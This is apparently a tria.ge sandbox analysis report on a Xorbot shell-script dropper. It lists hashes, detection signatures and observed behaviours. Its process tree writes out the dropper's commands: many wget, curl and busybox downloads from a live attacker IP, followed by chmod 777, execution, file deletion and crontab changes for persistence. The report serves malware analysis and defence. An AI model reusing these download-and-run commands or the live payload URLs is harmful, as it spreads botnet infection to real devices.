Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
152s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
02/03/2025, 02:22
Static task
static1
Behavioral task
behavioral1
Sample
4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh
-
Size
10KB
-
MD5
fcba5a159c1d4a387e0b6d819ab82b13
-
SHA1
aa69a7ab7c5829823641342bec0e3ad9f6fed0eb
-
SHA256
4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173
-
SHA512
87a1081d1536779e44642d1951eca3e1ff3ba1fc4a333b5442c12b6fdb02b0bfff290503e160f6b95e20be6f7e007cbc9b331c7cf6ed0670cdb147c2f54b7d94
-
SSDEEP
192:SKmamvfi3B3F3x3+3e3c04kJpga5k5M5uFpY9Hvva22jXv73Q1MA+L3LTLzm+3Hy:SKmamvfi3B3F3x3+3e3c04kJpgamCJ9R
Malware Config
Signatures
-
resource yara_rule behavioral3/files/fstream-1.dat family_xorbot behavioral3/files/fstream-3.dat family_xorbot behavioral3/files/fstream-5.dat family_xorbot behavioral3/files/fstream-7.dat family_xorbot behavioral3/files/fstream-9.dat family_xorbot behavioral3/files/fstream-11.dat family_xorbot -
Xorbot family
-
Contacts a large (1217) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 16 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 872 chmod 982 chmod 1011 chmod 732 chmod 819 chmod 854 chmod 975 chmod 996 chmod 739 chmod 804 chmod 812 chmod 960 chmod 1018 chmod 989 chmod 746 chmod 772 chmod -
Executes dropped EXE 16 IoCs
ioc pid Process /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G 733 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv 740 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E 747 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki 774 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr 805 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX 813 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA 821 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q 855 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR 873 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75 961 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f 976 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa 983 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb 990 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q 1001 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75 1012 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA 1019 4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh -
Renames itself 1 IoCs
pid Process 822 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.lAyrTE crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/947/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1116/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1122/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/929/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1060/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1104/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1144/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1145/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1151/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1178/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/10/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/369/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/381/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/877/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/973/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/994/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1051/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1125/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/78/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/699/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/789/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/940/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1021/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1133/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1138/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1158/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/71/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/918/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/974/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1072/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1187/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1221/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/77/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/895/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/898/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/958/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/1043/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1050/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1185/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/981/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1056/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1071/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1076/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1088/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1189/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1201/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/36/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/846/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/888/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/953/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1016/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1022/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1047/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1052/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/106/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/899/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/949/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/966/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1149/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1152/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1171/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA File opened for reading /proc/1235/cmdline MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 787 curl 799 busybox 805 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr 807 rm 779 wget -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G wget File opened for modification /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki wget File opened for modification /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki curl File opened for modification /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX curl File opened for modification /tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki busybox File opened for modification /tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR busybox File opened for modification /tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f busybox File opened for modification /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr wget File opened for modification /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr curl File opened for modification /tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr busybox File opened for modification /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX busybox File opened for modification /tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb busybox File opened for modification /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E curl File opened for modification /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75 busybox File opened for modification /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA busybox File opened for modification /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv busybox File opened for modification /tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q busybox File opened for modification /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv curl File opened for modification /tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX wget File opened for modification /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA wget File opened for modification /tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75 busybox File opened for modification /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G busybox File opened for modification /tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv wget File opened for modification /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E wget File opened for modification /tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E busybox File opened for modification /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA curl File opened for modification /tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G curl File opened for modification /tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA busybox File opened for modification /tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q busybox File opened for modification /tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa busybox
Processes
-
/tmp/4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh/tmp/4e0b27339e784ecfec59332890bec0c7cd664b60416f61c9fef79d936e12d173.sh1⤵
- Executes dropped EXE
PID:701 -
/bin/rm/bin/rm bins.sh2⤵PID:705
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- Writes file to tmp directory
PID:712
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- Writes file to tmp directory
PID:731
-
-
/bin/chmodchmod 777 tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G./tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵PID:733
-
-
/bin/rmrm tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G2⤵PID:735
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- Writes file to tmp directory
PID:736
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- Writes file to tmp directory
PID:738
-
-
/bin/chmodchmod 777 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv./59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵PID:740
-
-
/bin/rmrm 59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv2⤵PID:742
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- Writes file to tmp directory
PID:743
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- Writes file to tmp directory
PID:745
-
-
/bin/chmodchmod 777 l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E./l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵PID:747
-
-
/bin/rmrm l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E2⤵PID:751
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- Writes file to tmp directory
PID:752
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- Writes file to tmp directory
PID:759
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod 777 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki./1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵PID:774
-
-
/bin/rmrm 1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki2⤵PID:777
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:779
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/bin/chmodchmod 777 z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr./z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
PID:805
-
-
/bin/rmrm z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr2⤵
- System Network Configuration Discovery
PID:807
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX2⤵
- Writes file to tmp directory
PID:809
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX2⤵
- Writes file to tmp directory
PID:810
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX2⤵
- Writes file to tmp directory
PID:811
-
-
/bin/chmodchmod 777 kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX./kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX2⤵PID:813
-
-
/bin/rmrm kcZ7wDS9Ey1472EBe1Yh1UdgSWJCDpmXmX2⤵PID:815
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵
- Writes file to tmp directory
PID:816
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵
- Writes file to tmp directory
PID:817
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵
- Writes file to tmp directory
PID:818
-
-
/bin/chmodchmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA./MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵
- Renames itself
- Reads runtime system information
PID:821 -
/bin/shsh -c "crontab -l"3⤵PID:823
-
/usr/bin/crontabcrontab -l4⤵PID:825
-
-
-
/bin/shsh -c "crontab -"3⤵PID:826
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:827
-
-
-
-
/bin/rmrm MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵PID:838
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q2⤵PID:843
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q2⤵PID:846
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q2⤵
- Writes file to tmp directory
PID:848
-
-
/bin/chmodchmod 777 y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q2⤵
- File and Directory Permissions Modification
PID:854
-
-
/tmp/y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q./y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q2⤵PID:855
-
-
/bin/rmrm y4cOM46uRtKFAfg7vowXnJ6sPSo9YtWU4q2⤵PID:859
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR2⤵PID:860
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR2⤵PID:863
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR2⤵
- Writes file to tmp directory
PID:866
-
-
/bin/chmodchmod 777 wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR./wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR2⤵PID:873
-
-
/bin/rmrm wk7VTKwCVeEQJUdhBBXEYBpypx8AKzXuTR2⤵PID:876
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵PID:877
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵PID:878
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵
- Writes file to tmp directory
PID:959
-
-
/bin/chmodchmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵PID:961
-
-
/bin/rmrm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵PID:963
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f2⤵PID:964
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f2⤵PID:969
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f2⤵
- Writes file to tmp directory
PID:970
-
-
/bin/chmodchmod 777 j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f2⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f./j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f2⤵PID:976
-
-
/bin/rmrm j5pF2uRAfRIrxFbSnk6Wcqg8sFoHfAcw0f2⤵PID:978
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa2⤵PID:979
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa2⤵PID:980
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa2⤵
- Writes file to tmp directory
PID:981
-
-
/bin/chmodchmod 777 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa./7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa2⤵PID:983
-
-
/bin/rmrm 7QHC5pMEH9TTTNrssZuZWwCur8ig80hgfa2⤵PID:985
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb2⤵PID:986
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb2⤵
- Reads runtime system information
PID:987
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb2⤵
- Writes file to tmp directory
PID:988
-
-
/bin/chmodchmod 777 qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb2⤵
- File and Directory Permissions Modification
PID:989
-
-
/tmp/qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb./qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb2⤵PID:990
-
-
/bin/rmrm qLnWV2Qm5TJZwHN7QmPybNRlLE1HphWjfb2⤵PID:992
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q2⤵PID:993
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q2⤵PID:994
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q2⤵
- Writes file to tmp directory
PID:995
-
-
/bin/chmodchmod 777 ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q2⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q./ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q2⤵PID:1001
-
-
/bin/rmrm ObtRzbXMZ0GLfCR0BK23moxR4k1LgUKj5Q2⤵PID:1007
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵PID:1008
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵PID:1009
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵
- Writes file to tmp directory
PID:1010
-
-
/bin/chmodchmod 777 MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH75./MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵PID:1012
-
-
/bin/rmrm MCWmH8qLGsVQZzvbYfRMovyxDSv25KlH752⤵PID:1014
-
-
/usr/bin/wgetwget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵PID:1015
-
-
/usr/bin/curlcurl -O http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵
- Reads runtime system information
PID:1016
-
-
/bin/busybox/bin/busybox wget http://37.44.238.92/bins/MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵
- Writes file to tmp directory
PID:1017
-
-
/bin/chmodchmod 777 MDukejRpEVRJtAF8qJOUHxMH7xLDBBSPzA2⤵
- File and Directory Permissions Modification
PID:1018
-
-
